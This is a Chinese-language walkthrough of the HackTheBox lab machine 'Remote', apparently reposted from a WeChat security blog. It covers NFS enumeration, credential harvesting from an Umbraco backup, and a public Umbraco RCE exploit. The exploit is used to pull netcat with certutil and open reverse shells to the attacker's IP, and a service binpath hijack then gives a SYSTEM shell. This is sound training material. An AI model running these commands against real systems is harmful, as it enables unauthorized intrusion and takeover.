靶机信息
靶机地址:
https://app.hackthebox.com/machines/Remote
靶场: HackTheBox.com
靶机名称: Remote
难度: 简单
提示信息:
无
目标: user.txt和root.txt
实验环境
攻击机:Manjaro 10.10.16.4
靶机:10.10.10.180
信息收集
扫描端口
扫描靶机开放的服务端口
sudo nmap -p- --min-rate 10000 10.10.10.180
sudo nmap -sC -sV -p 21,80,111,135,139,445,2049,5985,47001 10.10.10.180 -oN nmap.log
扫描到多个开放端口,发现21(FTP)可以匿名访问,先来看看21端口
ftp里面是空的没有利用价值,再来看看445端口
smbmap -H 10.10.10.180
smbclient -L 10.10.10.180
SMB攻击失败,再来看看80端口
Web渗透
http://10.10.10.180
在CONTACT中发现后台地址,看名字是umbraco程序,查找是否存在漏洞
发现多个漏洞,但是不知道版本,再看看其他端口
NFS服务
showmount -e 10.10.10.180
发现共享目录,权限是everyone(所有人),挂载到本地搜集信息
mkdir /tmp/site_backups
sudo mount -t nfs 10.10.10.180:/site_backups /tmp/site_backups -o nolock
挂载成功,进入目录查看
看内容确认是umbraco网站的备份,搜集敏感信息
cat Web.config
在Web.config中确认版本为7.12.4,该版本存在远程命令执行漏洞(RCE)但是需要认证,再来搜集账号密码
find ./ |grep -rin admin
发现App_Data/Logs/UmbracoTraceLog.intranet.txt文件内存储账号[email protected]登录信息,继续收集密码
find ./ |grep -rin [email protected] |grep passw
找到一个二进制文件中包含[email protected]和pass,查看内容
strings App_Data/Umbraco.sdf
发现加密后的密码,尝试解密
https://www.somd5.com/
拿到密码,再来看看exp
https://www.exploit-db.com/exploits/49488
下载exp
wget https://www.exploit-db.com/download/49488
mv 49488 exp.py
下载完成,验证exp
py3 exp.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c whoami
命令执行成功,当前是iis权限,上传nc反弹shell到攻击上
1。攻击机在NC目录下开启HTTP服务
py3 -m http.server
2。靶机下载nc64.exe(上传到public目录是因为iis权限在这个目录可写)
py3 exp.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c cmd.exe -a'/c certutil.exe -urlcache -split -f http://10.10.16.4:8000/nc64.exe c:/users/public/nc.exe'
上传成功,继续
3。攻击机监听4444端口
nc -lvvp 4444
4。靶机执行反弹命令
py3 exp.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c cmd.exe -a'/c c:/users/public/nc.exe 10.10.16.4 4444 -e powershell'
反弹成功,继续搜集敏感信息
cd c:users
ls
cd public
ls
type user.txt
拿到user.txt,继续搜集
提权
上传提权辅助工具winPEASx64.exe
certutil.exe -urlcache -split -f http://10.10.16.4:8000/winPEASx64.exe wp.exe
执行提权辅助工具
./wp.exe
发现当前用户IIS对UsoSvc服务有开启关闭权限,来看看这个服务如何利用
sc.exe qc UsoSvc
替换服务中的程序路径,再重新启动服务
1。攻击机监听3333端口
nc -lvvp 3333
2。靶机上服务中的程序路径
sc.exe config UsoSvc binpath= "c:userspublicnc.exe 10.10.16.4 3333 -e powershell"
3。重启UsoSvc服务
sc.exe stop UsoSvc
sc.exe start UsoSvc
反弹成功,并且到system权限,但是有个问题这个shell很快就会断开,解决方法就是靶机上再开个2222端口,当3333反弹成功时立即执行一个反弹命令到攻击机的2222端口
c:userspublicnc.exe 10.10.16.4 2222 -e powershell
现在拿到一个稳定的shell了,找找最后的flag
cd c:usersadministrator
ls
cd desktop
ls
type root.txt
拿到root.txt,游戏结束
原文始发于微信公众号(伏波路上学安全):渗透测试靶机练习No.116 HTB:Remote
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论